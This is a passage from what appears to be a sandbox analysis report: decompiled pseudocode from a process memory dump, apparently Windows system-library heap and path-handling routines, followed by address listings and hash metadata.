                                  														_t362 =  *(_t528 - 0x80);
                                  														__eflags = _t362;
                                  														if(_t362 != 0) {
                                  															_t222 = _t362 + 4;
                                  															 *_t222 =  *(_t362 + 4) | 1;
                                  															__eflags =  *_t222;
                                  														}
                                  													}
                                  													__eflags =  *(_t528 - 0xb0);
                                  													if( *(_t528 - 0xb0) != 0) {
                                  														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
                                  														_t458 = 0xb;
                                  														 *((short*)(_t479 + _t427 + 2)) = _t458;
                                  														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
                                  														 *((short*)(_t427 + 4 + _t479)) = 0;
                                  														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
                                  														E0346FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
                                  														_t529 = _t529 + 0xc;
                                  														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                  														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
                                  														 *(_t528 - 0x78) = _t479;
                                  														__eflags = _t505;
                                  														if(_t505 != 0) {
                                  															_t241 = _t505 + 4;
                                  															 *_t241 =  *(_t505 + 4) | 1;
                                  															__eflags =  *_t241;
                                  														}
                                  													}
                                  													_t328 =  *(_t528 + 0x1c);
                                  													__eflags = _t328;
                                  													if(_t328 == 0) {
                                  														L87:
                                  														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
                                  														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
                                  														_t455 =  *(_t528 - 0xdc);
                                  														 *(_t427 + 0x14) = _t455;
                                  														_t480 =  *(_t528 - 0xa0);
                                  														_t517 = 3;
                                  														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
                                  														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
                                  															asm("rdtsc");
                                  															 *(_t427 + 0x3c) = _t480;
                                  														} else {
                                  															 *(_t427 + 0x3c) = _t455;
                                  														}
                                  														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
                                  														_t456 =  *[fs:0x18];
                                  														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
                                  														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
                                  														_t427 = 0;
                                  														__eflags = 0;
                                  														_t511 = 0x18;
                                  														goto L91;
                                  													} else {
                                  														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
                                  														__eflags = _t519;
                                  														 *(_t528 - 0x8c) = _t328;
                                  														do {
                                  															_t506 =  *((intOrPtr*)(_t519 - 4));
                                  															_t457 =  *((intOrPtr*)(_t519 - 0xc));
                                  															 *(_t528 - 0xd4) =  *(_t519 - 8);
                                  															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
                                  															__eflags =  *(_t333 + 0x36) & 0x00004000;
                                  															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
                                  																_t334 =  *_t519;
                                  															} else {
                                  																_t334 = 0;
                                  															}
                                  															_t336 = _t334 & 0x000000ff;
                                  															__eflags = _t336;
                                  															_t427 =  *(_t528 - 0x88);
                                  															if(_t336 == 0) {
                                  																_t481 = _t479 + _t506;
                                  																__eflags = _t481;
                                  																 *(_t528 - 0x78) = _t481;
                                  																E0346F3E0(_t479 + _t427, _t457, _t506);
                                  																_t529 = _t529 + 0xc;
                                  															} else {
                                  																_t340 = _t336 - 1;
                                  																__eflags = _t340;
                                  																if(_t340 == 0) {
                                  																	E0346F3E0( *(_t528 - 0xb8), _t457, _t506);
                                  																	_t529 = _t529 + 0xc;
                                  																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
                                  																} else {
                                  																	__eflags = _t340 == 0;
                                  																	if(_t340 == 0) {
                                  																		__eflags = _t506 - 8;
                                  																		if(_t506 == 8) {
                                  																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
                                  																			 *(_t528 - 0xdc) =  *(_t457 + 4);
                                  																		}
                                  																	}
                                  																}
                                  															}
                                  															_t339 = 0x10;
                                  															_t519 = _t519 + _t339;
                                  															_t263 = _t528 - 0x8c;
                                  															 *_t263 =  *(_t528 - 0x8c) - 1;
                                  															__eflags =  *_t263;
                                  															_t479 =  *(_t528 - 0x78);
                                  														} while ( *_t263 != 0);
                                  														goto L87;
                                  													}
                                  												}
                                  											} else {
                                  												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
                                  												 *(_t528 - 0xa2) = _t392;
                                  												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
                                  												__eflags = _t469;
                                  												while(1) {
                                  													 *(_t528 - 0xe4) = _t511;
                                  													__eflags = _t392;
                                  													_t393 = _t427;
                                  													if(_t392 != 0) {
                                  														_t393 =  *((intOrPtr*)(_t469 + 4));
                                  													}
                                  													_t395 = (_t393 & 0x000000ff) - _t427;
                                  													__eflags = _t395;
                                  													if(_t395 == 0) {
                                  														_t511 = _t511 +  *_t469;
                                  														__eflags = _t511;
                                  													} else {
                                  														_t398 = _t395 - 1;
                                  														__eflags = _t398;
                                  														if(_t398 == 0) {
                                  															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
                                  															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
                                  														} else {
                                  															__eflags = _t398 == 1;
                                  															if(_t398 == 1) {
                                  																 *(_t528 - 0xa8) =  *(_t469 - 8);
                                  																_t402 =  *_t469 & 0x0000ffff;
                                  																 *(_t528 - 0xac) = _t402;
                                  																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                                  															}
                                  														}
                                  													}
                                  													__eflags = _t511 -  *(_t528 - 0xe4);
                                  													if(_t511 <  *(_t528 - 0xe4)) {
                                  														break;
                                  													}
                                  													_t397 =  *(_t528 - 0x88) + 1;
                                  													 *(_t528 - 0x88) = _t397;
                                  													_t469 = _t469 + 0x10;
                                  													__eflags = _t397 -  *(_t528 + 0x1c);
                                  													_t392 =  *(_t528 - 0xa2);
                                  													if(_t397 <  *(_t528 + 0x1c)) {
                                  														continue;
                                  													}
                                  													goto L45;
                                  												}
                                  												_t475 = 0x216;
                                  												 *(_t528 - 0x74) = 0x216;
                                  												goto L45;
                                  											}
                                  										} else {
                                  											asm("lock dec dword [eax+ecx*8+0x4]");
                                  											goto L16;
                                  										}
                                  									}
                                  									_t491 = E034F4CAB(_t306, _t528 - 0xa4);
                                  									 *(_t528 - 0x74) = _t491;
                                  									__eflags = _t491;
                                  									if(_t491 != 0) {
                                  										goto L91;
                                  									} else {
                                  										_t474 =  *((intOrPtr*)(_t528 - 0x94));
                                  										goto L20;
                                  									}
                                  								}
                                  								L16:
                                  								 *(_t528 - 0x74) = 0x1069;
                                  								L93:
                                  								_t298 =  *(_t528 - 0xd0) + 1;
                                  								 *(_t528 - 0xd0) = _t298;
                                  								_t474 = _t474 + _t511;
                                  								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                                  								_t494 = 4;
                                  								__eflags = _t298 - _t494;
                                  								if(_t298 >= _t494) {
                                  									goto L100;
                                  								}
                                  								_t494 =  *(_t528 - 0xcc);
                                  								_t435 = _t298;
                                  								continue;
                                  							}
                                  							__eflags = _t494[2] | _t494[3];
                                  							if((_t494[2] | _t494[3]) == 0) {
                                  								goto L15;
                                  							}
                                  							goto L12;
                                  						}
                                  						__eflags = _t301;
                                  						if(_t301 != 0) {
                                  							goto L92;
                                  						}
                                  						goto L10;
                                  						L92:
                                  						goto L93;
                                  					}
                                  				} else {
                                  					_push(0x57);
                                  					L101:
                                  					return E0347D130(_t427, _t494, _t511);
                                  				}
                                  			}










































































                                  0x034f5ba5
                                  0x034f5baa
                                  0x034f5baf
                                  0x034f5bb4
                                  0x034f5bb6
                                  0x034f5bbc
                                  0x034f5bbe
                                  0x034f5bc4
                                  0x034f5bcd
                                  0x034f5bd3
                                  0x034f5bd6
                                  0x034f5bdc
                                  0x034f5be0
                                  0x034f5be3
                                  0x034f5beb
                                  0x034f5bf2
                                  0x034f5bf8
                                  0x034f5bfe
                                  0x034f5c04
                                  0x034f5c0e
                                  0x034f5c18
                                  0x034f5c1f
                                  0x034f5c25
                                  0x034f5c2a
                                  0x034f5c2c
                                  0x034f5c32
                                  0x034f5c3a
                                  0x034f5c3f
                                  0x034f5c42
                                  0x034f5c48
                                  0x034f5c5b
                                  0x034f5c5b
                                  0x034f5c2c
                                  0x034f5cb7
                                  0x034f5cb9
                                  0x034f5cbf
                                  0x034f5cc2
                                  0x034f5cca
                                  0x034f5ccb
                                  0x034f5ccb
                                  0x034f5cd1
                                  0x034f5cd7
                                  0x034f5cda
                                  0x034f5ce1
                                  0x034f5ce4
                                  0x034f5ce7
                                  0x034f5ced
                                  0x034f5cf3
                                  0x034f5cf9
                                  0x034f5cff
                                  0x034f5d08
                                  0x034f5d0a
                                  0x034f5d0e
                                  0x034f5d10
                                  0x00000000
                                  0x00000000
                                  0x034f5d16
                                  0x034f5d1a
                                  0x00000000
                                  0x00000000
                                  0x034f5d20
                                  0x034f5d22
                                  0x034f5d25
                                  0x034f5d2f
                                  0x034f5d2f
                                  0x034f5d33
                                  0x034f5d3d
                                  0x034f5d49
                                  0x034f5d4b
                                  0x00000000
                                  0x00000000
                                  0x034f5d5a
                                  0x034f5d5d
                                  0x034f5d60
                                  0x00000000
                                  0x00000000
                                  0x034f5d66
                                  0x034f5d69
                                  0x00000000
                                  0x00000000
                                  0x034f5d6f
                                  0x034f5d6f
                                  0x034f5d73
                                  0x034f5d79
                                  0x034f5d7f
                                  0x034f5d86
                                  0x034f5d95
                                  0x034f5d98
                                  0x034f5dba
                                  0x034f5dcb
                                  0x034f5dce
                                  0x034f5dd3
                                  0x034f5dd6
                                  0x034f5dd8
                                  0x034f5de6
                                  0x034f5dec
                                  0x034f5dee
                                  0x034f5df1
                                  0x034f5df3
                                  0x034f635a
                                  0x034f635a
                                  0x00000000
                                  0x034f635a
                                  0x034f5dfe
                                  0x034f5e02
                                  0x034f5e05
                                  0x034f5e07
                                  0x034f5e10
                                  0x034f5e13
                                  0x034f5e1b
                                  0x034f5e1c
                                  0x034f5e21
                                  0x034f5e22
                                  0x034f5e23
                                  0x034f5e25
                                  0x034f5e2a
                                  0x034f5e2c
                                  0x034f5e2e
                                  0x034f5e36
                                  0x034f5e39
                                  0x034f5e42
                                  0x034f5e47
                                  0x034f5e4d
                                  0x034f5e54
                                  0x034f5e54
                                  0x034f5e54
                                  0x034f5e2e
                                  0x034f5e5c
                                  0x034f5e5f
                                  0x034f5e62
                                  0x034f5e64
                                  0x034f5e6b
                                  0x034f5e70
                                  0x034f5e7a
                                  0x034f5e7a
                                  0x034f5e7a
                                  0x034f5e6b
                                  0x034f5e7e
                                  0x034f5e7f
                                  0x034f5e7f
                                  0x034f5e81
                                  0x034f5e87
                                  0x034f5e8b
                                  0x034f5e8c
                                  0x034f5e8c
                                  0x034f5e8c
                                  0x034f5e9a
                                  0x034f5e9c
                                  0x034f5ea2
                                  0x034f5ea6
                                  0x034f5f50
                                  0x034f5f50
                                  0x034f5f57
                                  0x034f5f66
                                  0x034f5f66
                                  0x034f5f66
                                  0x034f5f68
                                  0x034f5f6a
                                  0x034f63d0
                                  0x00000000
                                  0x034f5f70
                                  0x034f5f70
                                  0x034f5f91
                                  0x034f5f9c
                                  0x034f5f9e
                                  0x034f5fa4
                                  0x034f5fa6
                                  0x034f638c
                                  0x034f6392
                                  0x034f63a1
                                  0x034f63a7
                                  0x034f63af
                                  0x034f63af
                                  0x034f63bd
                                  0x034f63d8
                                  0x00000000
                                  0x034f63d8
                                  0x034f5fac
                                  0x034f5fb2
                                  0x034f5fb4
                                  0x034f5fbd
                                  0x034f5fc6
                                  0x034f5fce
                                  0x034f5fd4
                                  0x034f5fdc
                                  0x034f5fec
                                  0x034f5fed
                                  0x034f5fee
                                  0x034f5fef
                                  0x034f5ff9
                                  0x034f5ffa
                                  0x034f5ffb
                                  0x034f5ffc
                                  0x034f6000
                                  0x034f6004
                                  0x034f6012
                                  0x034f6012
                                  0x034f6018
                                  0x034f6019
                                  0x034f601a
                                  0x034f601b
                                  0x034f601c
                                  0x034f6020
                                  0x034f6059
                                  0x034f605c
                                  0x034f6061
                                  0x034f6061
                                  0x034f6022
                                  0x034f6022
                                  0x034f6022
                                  0x034f6025
                                  0x034f602a
                                  0x034f602b
                                  0x034f6031
                                  0x034f6037
                                  0x034f6038
                                  0x034f603e
                                  0x034f6048
                                  0x034f6049
                                  0x034f604a
                                  0x034f604b
                                  0x034f604c
                                  0x034f604d
                                  0x034f6053
                                  0x034f6054
                                  0x034f6054
                                  0x034f6062
                                  0x034f6065
                                  0x034f6067
                                  0x034f606a
                                  0x034f6070
                                  0x034f6075
                                  0x034f6076
                                  0x034f6081
                                  0x034f6087
                                  0x034f6095
                                  0x034f6099
                                  0x034f609e
                                  0x034f60a4
                                  0x034f60ae
                                  0x034f60b0
                                  0x034f60b3
                                  0x034f60b6
                                  0x034f60b8
                                  0x034f60ba
                                  0x034f60ba
                                  0x034f60ba
                                  0x034f60ba
                                  0x034f60be
                                  0x034f60c0
                                  0x034f60c5
                                  0x034f60c5
                                  0x034f60c5
                                  0x034f60c6
                                  0x034f60cd
                                  0x034f6114
                                  0x034f60cf
                                  0x034f60cf
                                  0x034f60d4
                                  0x034f60d5
                                  0x034f60da
                                  0x034f60db
                                  0x034f60e1
                                  0x034f60e2
                                  0x034f60e8
                                  0x034f60f8
                                  0x034f60fd
                                  0x034f60fe
                                  0x034f6102
                                  0x034f6104
                                  0x034f6107
                                  0x034f6109
                                  0x034f610b
                                  0x034f610b
                                  0x034f610b
                                  0x034f610b
                                  0x034f610f
                                  0x034f610f
                                  0x034f6117
                                  0x034f611a
                                  0x034f611f
                                  0x034f6125
                                  0x034f6134
                                  0x034f6139
                                  0x034f613f
                                  0x034f6146
                                  0x034f6148
                                  0x034f614b
                                  0x034f614d
                                  0x034f614f
                                  0x034f614f
                                  0x034f614f
                                  0x034f614f
                                  0x034f6153
                                  0x034f6159
                                  0x034f6159
                                  0x034f615c
                                  0x034f6163
                                  0x034f6169
                                  0x034f616c
                                  0x034f6172
                                  0x034f6181
                                  0x034f6186
                                  0x034f6187
                                  0x034f618b
                                  0x034f6191
                                  0x034f6195
                                  0x034f61a3
                                  0x034f61bb
                                  0x034f61c0
                                  0x034f61c3
                                  0x034f61cc
                                  0x034f61d0
                                  0x034f61dc
                                  0x034f61de
                                  0x034f61e1
                                  0x034f61e4
                                  0x034f61e6
                                  0x034f61e8
                                  0x034f61e8
                                  0x034f61e8
                                  0x034f61e8
                                  0x034f61e6
                                  0x034f61ec
                                  0x034f61f3
                                  0x034f6203
                                  0x034f6209
                                  0x034f620a
                                  0x034f6216
                                  0x034f621d
                                  0x034f6227
                                  0x034f6241
                                  0x034f6246
                                  0x034f624c
                                  0x034f6257
                                  0x034f6259
                                  0x034f625c
                                  0x034f625e
                                  0x034f6260
                                  0x034f6260
                                  0x034f6260
                                  0x034f6260
                                  0x034f625e
                                  0x034f6264
                                  0x034f6267
                                  0x034f6269
                                  0x034f6315
                                  0x034f6315
                                  0x034f631b
                                  0x034f631e
                                  0x034f6324
                                  0x034f6327
                                  0x034f632f
                                  0x034f6330
                                  0x034f6333
                                  0x034f633a
                                  0x034f633c
                                  0x034f6335
                                  0x034f6335
                                  0x034f6335
                                  0x034f633f
                                  0x034f6342
                                  0x034f634c
                                  0x034f6352
                                  0x034f6355
                                  0x034f6355
                                  0x034f6359
                                  0x00000000
                                  0x034f626f
                                  0x034f6275
                                  0x034f6275
                                  0x034f6278
                                  0x034f627e
                                  0x034f627e
                                  0x034f6281
                                  0x034f6287
                                  0x034f628d
                                  0x034f6298
                                  0x034f629c
                                  0x034f62a2
                                  0x034f629e
                                  0x034f629e
                                  0x034f629e
                                  0x034f62a7
                                  0x034f62a7
                                  0x034f62aa
                                  0x034f62b0
                                  0x034f62f0
                                  0x034f62f0
                                  0x034f62f2
                                  0x034f62f8
                                  0x034f62fd
                                  0x034f62b2
                                  0x034f62b2
                                  0x034f62b2
                                  0x034f62b5
                                  0x034f62dd
                                  0x034f62e2
                                  0x034f62e5
                                  0x034f62b7
                                  0x034f62b8
                                  0x034f62bb
                                  0x034f62bd
                                  0x034f62c0
                                  0x034f62c4
                                  0x034f62cd
                                  0x034f62cd
                                  0x034f62c0
                                  0x034f62bb
                                  0x034f62b5
                                  0x034f6302
                                  0x034f6303
                                  0x034f6305
                                  0x034f6305
                                  0x034f6305
                                  0x034f630c
                                  0x034f630c
                                  0x00000000
                                  0x034f627e
                                  0x034f6269
                                  0x034f5eac
                                  0x034f5ebb
                                  0x034f5ebe
                                  0x034f5ecb
                                  0x034f5ecb
                                  0x034f5ece
                                  0x034f5ece
                                  0x034f5ed4
                                  0x034f5ed7
                                  0x034f5ed9
                                  0x034f5edb
                                  0x034f5edb
                                  0x034f5ee1
                                  0x034f5ee1
                                  0x034f5ee3
                                  0x034f5f20
                                  0x034f5f20
                                  0x034f5ee5
                                  0x034f5ee5
                                  0x034f5ee5
                                  0x034f5ee8
                                  0x034f5f11
                                  0x034f5f18
                                  0x034f5eea
                                  0x034f5eea
                                  0x034f5eed
                                  0x034f5ef2
                                  0x034f5ef8
                                  0x034f5efb
                                  0x034f5f0a
                                  0x034f5f0a
                                  0x034f5eed
                                  0x034f5ee8
                                  0x034f5f22
                                  0x034f5f28
                                  0x00000000
                                  0x00000000
                                  0x034f5f30
                                  0x034f5f31
                                  0x034f5f37
                                  0x034f5f3a
                                  0x034f5f3d
                                  0x034f5f44
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x034f5f46
                                  0x034f5f48
                                  0x034f5f4d
                                  0x00000000
                                  0x034f5f4d
                                  0x034f5dda
                                  0x034f5ddf
                                  0x00000000
                                  0x034f5ddf
                                  0x034f5dd8
                                  0x034f5da7
                                  0x034f5da9
                                  0x034f5dac
                                  0x034f5dae
                                  0x00000000
                                  0x034f5db4
                                  0x034f5db4
                                  0x00000000
                                  0x034f5db4
                                  0x034f5dae
                                  0x034f5d88
                                  0x034f5d8d
                                  0x034f6363
                                  0x034f6369
                                  0x034f636a
                                  0x034f6370
                                  0x034f6372
                                  0x034f637a
                                  0x034f637b
                                  0x034f637d
                                  0x00000000
                                  0x00000000
                                  0x034f637f
                                  0x034f6385
                                  0x00000000
                                  0x034f6385
                                  0x034f5d38
                                  0x034f5d3b
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x034f5d3b
                                  0x034f5d27
                                  0x034f5d29
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x034f6360
                                  0x00000000
                                  0x034f6360
                                  0x034f5c10
                                  0x034f5c10
                                  0x034f63da
                                  0x034f63e5
                                  0x034f63e5

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c4c339850f72e95b3516ceae99861a84e6e6d608bee8c417a6519a6436274706
                                  • Instruction ID: 6523df6229a4a83d74b4c587323216cb378cd0c71317d87456edea66483906ba
                                  • Opcode Fuzzy Hash: c4c339850f72e95b3516ceae99861a84e6e6d608bee8c417a6519a6436274706
                                  • Instruction Fuzzy Hash: 9F424875900229CFDB24CF68C880BAAB7B1FF49304F1981EAD95DAB342D7359A85CF54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 92%
                                  			E03444120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
                                  				signed int _v8;
                                  				void* _v20;
                                  				signed int _v24;
                                  				char _v532;
                                  				char _v540;
                                  				signed short _v544;
                                  				signed int _v548;
                                  				signed short* _v552;
                                  				signed short _v556;
                                  				signed short* _v560;
                                  				signed short* _v564;
                                  				signed short* _v568;
                                  				void* _v570;
                                  				signed short* _v572;
                                  				signed short _v576;
                                  				signed int _v580;
                                  				char _v581;
                                  				void* _v584;
                                  				unsigned int _v588;
                                  				signed short* _v592;
                                  				void* _v597;
                                  				void* _v600;
                                  				void* _v604;
                                  				void* _v609;
                                  				void* _v616;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				unsigned int _t161;
                                  				signed int _t162;
                                  				unsigned int _t163;
                                  				void* _t169;
                                  				signed short _t173;
                                  				signed short _t177;
                                  				signed short _t181;
                                  				unsigned int _t182;
                                  				signed int _t185;
                                  				signed int _t213;
                                  				signed int _t225;
                                  				short _t233;
                                  				signed char _t234;
                                  				signed int _t242;
                                  				signed int _t243;
                                  				signed int _t244;
                                  				signed int _t245;
                                  				signed int _t250;
                                  				void* _t251;
                                  				signed short* _t254;
                                  				void* _t255;
                                  				signed int _t256;
                                  				void* _t257;
                                  				signed short* _t260;
                                  				signed short _t265;
                                  				signed short* _t269;
                                  				signed short _t271;
                                  				signed short** _t272;
                                  				signed short* _t275;
                                  				signed short _t282;
                                  				signed short _t283;
                                  				signed short _t290;
                                  				signed short _t299;
                                  				signed short _t307;
                                  				signed int _t308;
                                  				signed short _t311;
                                  				signed short* _t315;
                                  				signed short _t316;
                                  				void* _t317;
                                  				void* _t319;
                                  				signed short* _t321;
                                  				void* _t322;
                                  				void* _t323;
                                  				unsigned int _t324;
                                  				signed int _t325;
                                  				void* _t326;
                                  				signed int _t327;
                                  				signed int _t329;
                                  
                                  				_t329 = (_t327 & 0xfffffff8) - 0x24c;
                                  				_v8 =  *0x351d360 ^ _t329;
                                  				_t157 = _a8;
                                  				_t321 = _a4;
                                  				_t315 = __edx;
                                  				_v548 = __ecx;
                                  				_t305 = _a20;
                                  				_v560 = _a12;
                                  				_t260 = _a16;
                                  				_v564 = __edx;
                                  				_v580 = _a8;
                                  				_v572 = _t260;
                                  				_v544 = _a20;
                                  				if( *__edx <= 8) {
                                  					L3:
                                  					if(_t260 != 0) {
                                  						 *_t260 = 0;
                                  					}
                                  					_t254 =  &_v532;
                                  					_v588 = 0x208;
                                  					if((_v548 & 0x00000001) != 0) {
                                  						_v556 =  *_t315;
                                  						_v552 = _t315[2];
                                  						_t161 = E0345F232( &_v556);
                                  						_t316 = _v556;
                                  						_v540 = _t161;
                                  						goto L17;
                                  					} else {
                                  						_t306 = 0x208;
                                  						_t298 = _t315;
                                  						_t316 = E03446E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
                                  						if(_t316 == 0) {
                                  							L68:
                                  							_t322 = 0xc0000033;
                                  							goto L39;
                                  						} else {
                                  							while(_v581 == 0) {
                                  								_t233 = _v588;
                                  								if(_t316 > _t233) {
                                  									_t234 = _v548;
                                  									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
                                  										_t254 = L03444620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
                                  										if(_t254 == 0) {
                                  											_t169 = 0xc0000017;
                                  										} else {
                                  											_t298 = _v564;
                                  											_v588 = _t316;
                                  											_t306 = _t316;
                                  											_t316 = E03446E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
                                  											if(_t316 != 0) {
                                  												continue;
                                  											} else {
                                  												goto L68;
                                  											}
                                  										}
                                  									} else {
                                  										goto L90;
                                  									}
                                  								} else {
                                  									_v556 = _t316;
                                  									 *((short*)(_t329 + 0x32)) = _t233;
                                  									_v552 = _t254;
                                  									if(_t316 < 2) {
                                  										L11:
                                  										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
                                  											_t161 = 5;
                                  										} else {
                                  											if(_t316 < 6) {
                                  												L87:
                                  												_t161 = 3;
                                  											} else {
                                  												_t242 = _t254[2] & 0x0000ffff;
                                  												if(_t242 != 0x5c) {
                                  													if(_t242 == 0x2f) {
                                  														goto L16;
                                  													} else {
                                  														goto L87;
                                  													}
                                  													goto L101;
                                  												} else {
                                  													L16:
                                  													_t161 = 2;
                                  												}
                                  											}
                                  										}
                                  									} else {
                                  										_t243 =  *_t254 & 0x0000ffff;
                                  										if(_t243 == 0x5c || _t243 == 0x2f) {
                                  											if(_t316 < 4) {
                                  												L81:
                                  												_t161 = 4;
                                  												goto L17;
                                  											} else {
                                  												_t244 = _t254[1] & 0x0000ffff;
                                  												if(_t244 != 0x5c) {
                                  													if(_t244 == 0x2f) {
                                  														goto L60;
                                  													} else {
                                  														goto L81;
                                  													}
                                  												} else {
                                  													L60:
                                  													if(_t316 < 6) {
                                  														L83:
                                  														_t161 = 1;
                                  														goto L17;
                                  													} else {
                                  														_t245 = _t254[2] & 0x0000ffff;
                                  														if(_t245 != 0x2e) {
                                  															if(_t245 == 0x3f) {
                                  																goto L62;
                                  															} else {
                                  																goto L83;
                                  															}
                                  														} else {
                                  															L62:
                                  															if(_t316 < 8) {
                                  																L85:
                                  																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
                                  																goto L17;
                                  															} else {
                                  																_t250 = _t254[3] & 0x0000ffff;
                                  																if(_t250 != 0x5c) {
                                  																	if(_t250 == 0x2f) {
                                  																		goto L64;
                                  																	} else {
                                  																		goto L85;
                                  																	}
                                  																} else {
                                  																	L64:
                                  																	_t161 = 6;
                                  																	goto L17;
                                  																}
                                  															}
                                  														}
                                  													}
                                  												}
                                  											}
                                  											goto L101;
                                  										} else {
                                  											goto L11;
                                  										}
                                  									}
                                  									L17:
                                  									if(_t161 != 2) {
                                  										_t162 = _t161 - 1;
                                  										if(_t162 > 5) {
                                  											goto L18;
                                  										} else {
                                  											switch( *((intOrPtr*)(_t162 * 4 +  &M034445F8))) {
                                  												case 0:
                                  													_v568 = 0x3401078;
                                  													__eax = 2;
                                  													goto L20;
                                  												case 1:
                                  													goto L18;
                                  												case 2:
                                  													_t163 = 4;
                                  													goto L19;
                                  											}
                                  										}
                                  										goto L41;
                                  									} else {
                                  										L18:
                                  										_t163 = 0;
                                  										L19:
                                  										_v568 = 0x34011c4;
                                  									}
                                  									L20:
                                  									_v588 = _t163;
                                  									_v564 = _t163 + _t163;
                                  									_t306 =  *_v568 & 0x0000ffff;
                                  									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
                                  									_v576 = _t265;
                                  									if(_t265 > 0xfffe) {
                                  										L90:
                                  										_t322 = 0xc0000106;
                                  									} else {
                                  										if(_t321 != 0) {
                                  											if(_t265 > (_t321[1] & 0x0000ffff)) {
                                  												if(_v580 != 0) {
                                  													goto L23;
                                  												} else {
                                  													_t322 = 0xc0000106;
                                  													goto L39;
                                  												}
                                  											} else {
                                  												_t177 = _t306;
                                  												goto L25;
                                  											}
                                  											goto L101;
                                  										} else {
                                  											if(_v580 == _t321) {
                                  												_t322 = 0xc000000d;
                                  											} else {
                                  												L23:
                                  												_t173 = L03444620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
                                  												_t269 = _v592;
                                  												_t269[2] = _t173;
                                  												if(_t173 == 0) {
                                  													_t322 = 0xc0000017;
                                  												} else {
                                  													_t316 = _v556;
                                  													 *_t269 = 0;
                                  													_t321 = _t269;
                                  													_t269[1] = _v576;
                                  													_t177 =  *_v568 & 0x0000ffff;
                                  													L25:
                                  													_v580 = _t177;
                                  													if(_t177 == 0) {
                                  														L29:
                                  														_t307 =  *_t321 & 0x0000ffff;
                                  													} else {
                                  														_t290 =  *_t321 & 0x0000ffff;
                                  														_v576 = _t290;
                                  														_t310 = _t177 & 0x0000ffff;
                                  														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
                                  															_t307 =  *_t321 & 0xffff;
                                  														} else {
                                  															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
                                  															E0346F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
                                  															_t329 = _t329 + 0xc;
                                  															_t311 = _v580;
                                  															_t225 =  *_t321 + _t311 & 0x0000ffff;
                                  															 *_t321 = _t225;
                                  															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
                                  																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
                                  															}
                                  															goto L29;
                                  														}
                                  													}
                                  													_t271 = _v556 - _v588 + _v588;
                                  													_v580 = _t307;
                                  													_v576 = _t271;
                                  													if(_t271 != 0) {
                                  														_t308 = _t271 & 0x0000ffff;
                                  														_v588 = _t308;
                                  														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
                                  															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
                                  															E0346F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
                                  															_t329 = _t329 + 0xc;
                                  															_t213 =  *_t321 + _v576 & 0x0000ffff;
                                  															 *_t321 = _t213;
                                  															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
                                  																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
                                  															}
                                  														}
                                  													}
                                  													_t272 = _v560;
                                  													if(_t272 != 0) {
                                  														 *_t272 = _t321;
                                  													}
                                  													_t306 = 0;
                                  													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
                                  													_t275 = _v572;
                                  													if(_t275 != 0) {
                                  														_t306 =  *_t275;
